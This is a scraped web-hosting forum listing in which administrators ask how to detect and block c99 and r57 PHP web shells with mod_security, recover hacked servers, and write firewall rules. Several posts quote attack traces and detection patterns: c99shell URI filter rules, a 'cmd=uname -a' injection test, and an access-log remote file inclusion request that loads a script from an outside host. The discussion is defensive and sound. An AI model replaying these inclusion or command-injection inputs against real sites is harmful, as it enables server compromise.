C99Shell :: Attack Rules For Mod_security
Oct 3, 2007
i want to prevent c99shell scripts from running.
I found this rule to detect URI's for the c99 shell.
#new kit
SecFilterSelective REQUEST_URI "/c99shell.txt"
SecFilterSelective REQUEST_URI "/c99.txt?"
My problem is that the hackers are being more stealthy and calling the
script some random name like .../myphpstuff.php. So the URI no longer helps detect it.
How could I detect "c99shell" in the actual file that apache servers? This assumes that the hacker was successfully in installing it.
my box
Apache 1.3.37
WHM 11.2.0 cPanel 11.11.0-R16983
FEDORA 5 i686 - WHM X v3.1.0
View 3 Replies
ADVERTISEMENT
Jun 5, 2007
I installed modsecurity from Addone module in Cpanel
When I try to apply phpshell woork good without a mistakes and I can do anything despite of the presence of protection modsecurity and disable_functions in php.ini.
Is there a particular settings add to the httpd.conf to prevent application phpshell or prevent upload it to the site?
View 14 Replies
View Related
May 25, 2009
Is it possible to disable a particular mod_security rule for particular directory or the rules are global?
View 4 Replies
View Related
Aug 15, 2008
I just installed mod_security via WHM, and want to know what rule should I enter to prevent some URLs from being opened.
For example, if URL contains word "abc" (like domain.com/some_folder/abc/file.php), it should not be opened.
View 4 Replies
View Related
Jun 4, 2008
how to set the rules of MOD_Security.
Another question for professionals:
Q: What are the best rules to secure my server? I'd appreciate if you managed to attach these rules to your replies. // FYI, I host VBulletin portals.
View 3 Replies
View Related
Feb 25, 2008
make this rules work on apache 2 mod_security 2?
View 4 Replies
View Related
Dec 17, 2008
Any good secure rules for mod_security 2 that work well for shared servers?
Can someone share what rules you are using to secure your shared servers. Have tried a few different sets of rules, but a few customers always end up with errors and disabling it for their domain name doesn't sound like a safer option for them or the server.
Share your mod_sec 2 rules.
View 2 Replies
View Related
May 10, 2008
Is there any difference with the old one?
I have a customized modsecurity.conf file in my old Apache 1.3 server. Is it ok to copy it to new modsec2.conf?
View 13 Replies
View Related
Nov 6, 2009
We were recently hacked on our dedicated server and the hacker managed to insert php files that generated thousands of doorway pages in one of our images folder on our site. We have done an extensive cleanup of our site, removing all malicious files and are locking down the server. We have already updated to the latest versions of PHP and Wordpress,not to mention change all database passwords and admin password. My question is about mod_security for apache.
We were told Mod_security can prevent this from happening again but it must be configured correctly.
We have already set rules for mod_security. The rules set up are in the files in the directory, /etc/httpd/modsecurity.d/modsec. We were told that the file 10_asl_rules.conf specifically has filters to prevent SQL injection attacks.
These are are current rules:
----------------------------------------------------------------------
/etc/httpd/modsecurity.d/modsec
# ls
05_asl_exclude.conf 30_asl_antispam.conf domain-blacklist-local.txt malware-blacklist.txt
05_asl_scanner.conf 30_asl_antispam_referrer.conf domain-blacklist.txt sql.txt
10_asl_antimalware.conf 40_asl_apache2-rules.conf domain-spam-whitelist.conf trusted-domains.conf
10_asl_rules.conf 50_asl_rootkits.conf domain-spam-whitelist.txt trusted-domains.txt
11_asl_data_loss.conf 60_asl_recons.conf malware-blacklist-high.txt whitelist.txt
20_asl_useragents.conf 99_asl_exclude.conf malware-blacklist-local.txt
30_asl_antimalware.conf 99_asl_jitp.conf malware-blacklist-low.txt
-----------------------------------------------------------------
I can do to prevent this or tune up apache mod_security from letting this happen again. We are so paranoid that we are now checking our access log files for POST commands every day?
View 13 Replies
View Related
Jul 2, 2009
Im using a vps with centos 5 and cpanel/whm with apache 2.2.
Im tring to figure out how to use the gotroot rules with mod_security. I had enabled mod_security with easy apache. I tried to follow some other post had I found around on other forums with no luck really, with that said I am a linux noob. I had tried to follow the wiki on atomic sites <-- not enof post so I cant do links sorry, but I found it hard to under stand cause I dont have a modsecurity.config file that I can find, also I cant find AddModule mod_security.c in my httpd.config, but I did find this line, Include "/usr/local/apache/conf/modsec2.conf". My thing is im looking for a complete noob guide on how to use gotroot rules with mod_security enabled through easy apache, or would it be easyer to manully install mod_security?
View 11 Replies
View Related
Nov 4, 2009
I am having the Modsec 2.5.9 I am using the defaults rules by the cpanel when i try to update the rules along with default rules given by the cpanel i am getting internal server error (500 Error)
The rules i tried to implement are from
Quote:
[url]
View 5 Replies
View Related
May 1, 2009
How can I update mod_security rules in Cpanel/WHM server from gotroot.com?
View 3 Replies
View Related
Apr 29, 2008
I doubt anyone is writing their own rules so what do you think is the best site for mod_security rules which are strong but also do not result in many false positives.
I know of [url] posts rules but is there anyone else worth mentioning?
View 8 Replies
View Related
Mar 23, 2009
I'm the main author of a control panel, and we are working toward security enforcement. So we are looking at what kinds of rules we can add in mod_security.
The issue is that our control panel is open source, and that, even if I have found some nice mod_security rule sets on the internet (for example at gotroot.com), I need to get some that are FREE (as freedom), and that I can include in our project.
What I am looking for is application specific rules (like the ones preventing phpBB highlight insertions, for example), so having someone using an old version of a given software on his hosting space is not an issue anymore.
View 0 Replies
View Related
Feb 4, 2008
I just wanted to confirm if you guys had the same problem. It seems that mod_security with gotroot rules for apache 1.3 is filtering out firefox. Everything works fine with IE. With the latest firefox I get this for any page requested:
mod_security-message: Access denied with code 500. Pattern match "^GET (http|https|ftp):/" at THE_REQUEST [severity "EMERGENCY"]
View 4 Replies
View Related
Jul 13, 2008
Recently my site was defaced, (i own a dedicated server), my server was not touched, but one of the applications I used on the site was exploited to gain access to it.
I have noticed 4 or 5 c99 shells in different locations on my ftp. The site is back online, but it's definitely possible that they have one of these hidden somewhere and that they'll just do it again. I am using cent os 5
How can I easily search for these on my box? Can I disable their functionality? is there setting I can use in htaccess or something to make my website safer? I visited one of the scripts, and it said SAFEMODE OFF, how can I at least enable safemode?
I don't know much of anything about linux, but I am running cpanel and WHM. I have a guy who manages my box but he is hard to get a hold of sometimes, and I'd like to take care of this ASAP!
View 6 Replies
View Related
Jul 22, 2008
I just installed mod_security and would like to test some common attack to see if it's blocking it
I tried passing "cmd=uname -a" as parameter to a .php, but it didn't block it
any other test I can try?
I'm using almost all rules from gotroot
View 8 Replies
View Related
Jun 17, 2008
how to block the following "WEB-PHP remote include path" attack using mod_security.
I have tried using Default Mod_Securty and also Mod_security from [url]
But it seems that the mod_security did not functioning well in which PHP inject script still able to run on my server.
The following is the WEB-PHP remote include path that i mentioned about taken from the Apache Access log.
=================================
127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473 ....
View 1 Replies
View Related
Jul 30, 2009
I found these folders in the root
/usr/bin/c99
/usr/include/boost/numeric/interval/detail/c99_rounding_control.hpp
/usr/include/boost/numeric/interval/detail/c99sub_rounding_control.hpp
what are these ? is it normal folders ? or somebody hacked our server?
what shall I do?
View 10 Replies
View Related
Jul 1, 2009
I just installed zen cart on my webhosting and after few days later i saw some file written like core1405.php and when i open to view the file it is actually trojan c99shell.
I have deleted all of the core file. Now how can i prevent it from happen again? Cause it is too much work to clean up the hosting server.
View 14 Replies
View Related
Nov 5, 2009
How to stops the scripts like c99 shell from installing into the server?
View 1 Replies
View Related
Jun 25, 2007
guys im tired off fighting those hackers everyday! i have about 20 websites,and everyday i have one of them hacked! i restore a backup then another one hacked!
thats unbelivable!!!
those bastards upload there shell scripts to websites via bugs or whatever from php files!!
is there anyway to stop these commands?
can .htaccess helps? how?
i talked to my webhosting companies for my websites! ....
View 10 Replies
View Related
Sep 3, 2007
the biggest security issue i have with my clients is php c99 shell and similar php files, somehow these files uploaded on the website and from here they start attacking the websites.
i have seen also that once you upload the c99 php file you are able to see the accounts information ( such as a user name ) on the same server
so is there any way to disable this kind of php file or at least disable some function within the file!
i have been thinking to install and run a antivirus on the server , but i see sometimes they upload the encrypted version of the file , so the antirus can't catch the file as a torjan!
View 14 Replies
View Related
Aug 15, 2008
how i can detect and disable C99 shell and another shell script exp:r57 ....
View 9 Replies
View Related
Oct 19, 2007
Is there a way to stop them totally? i.e. even though they are successfully uploaded but I do not want the source to be available to them etc.?
I mean, is there a way to hide or not allow them to execute any shell?
View 7 Replies
View Related
Sep 1, 2008
I have few scripts, but hackers again upload at some way c99, and hack some SMF forums at server. Server like server they cannot hack, but user account they can. So please tell me what you advice?
View 6 Replies
View Related
Aug 9, 2006
I signed up with Lunarpages a while back for a dedicated server for my business. Good price, managed hosting rocks, decent disk space... little problem once with a huge power outage, but **** happens, cool.
All is well until I wake up this morning to an email a minute about a failed cron job. It smells fishy, so I contact LUnar pages support to see whats up.
They inform me that some asswad had managed to brute force into my server using a temporary account I set up a while back for some tech support. (I prefaced this with 'im an idiot', so no you know why)
Either way, my server now has a rootkit, plus other **** im sure im not aware of... so they propose to move me to a brand new fresh box. im thinking they are gonna charge me a fee for this, a fee for that... no way. All is free of charge.
Im ****ting kittens now.
so im resetting everything up, and i manage to look myself out of my database...(i told you I was an idiot.. and this was a looooong day already)
they fix it. again. no problem...
If you are looking for a dedicated server, go to lunarpages. otherwise you are a freaking idiot as far as I am concerned...
Lunarpages, I love you, I want your babies...
PS: I am in no way affiliated with lunarpages... however, if they want to give me a free year on their servers, i wouldnt complain... *hint hint*
View 0 Replies
View Related
Jul 2, 2009
One of my low knowledge area's is Iptables Rule's I just normally use APF/CSF.
However on a VPS Host node, I basically want to block all access to a certain port let's say 1234 apart from a certain IP address.
However I don't want to block this port on any of the VPS's on the Node, so what Iptable Rule(s) would I need to put into a bash script on startup.
View 7 Replies
View Related
May 26, 2009
I want to block the icmp6 and traceroute on my ipv6 server,how can i do it?
View 1 Replies
View Related
Mar 15, 2008
i have server windows 2003.
ISS 6.
PHP 5.x
MySQL 5.0
how to create rules with ip/5hit/s is black list and auto ban ip with IPSec.
when test attack file .php
info test :
using code attack files.
attack file test.php ( code files : <?php echo "we are test" ; ?> )
Ex : attack files test.php ( http://mydomain.php/test.php )
attack 200hit/s ( all files .php is not run ) php application is hang.
also wherewith code attack. i tested asp, html. it isn't problem. ( 1879hit/s ) ( good working)
how to create rules ban ip with 5hit/s?
View 2 Replies
View Related
Nov 28, 2007
I'v just upgraded to apache2.2 and modsecurity2
there is a difference between modsec1 and 2 rules
so i can't use modsecurity1 rules
so can i have rules for modsecurity2
and can you tell me how do i create a new rules
in modsecuirty1 i just do this :
Code:
SecFilter "cmd"
in modsecurity2 i triad:
Code:
SecRule "cmd"
but it didn't work
View 2 Replies
View Related
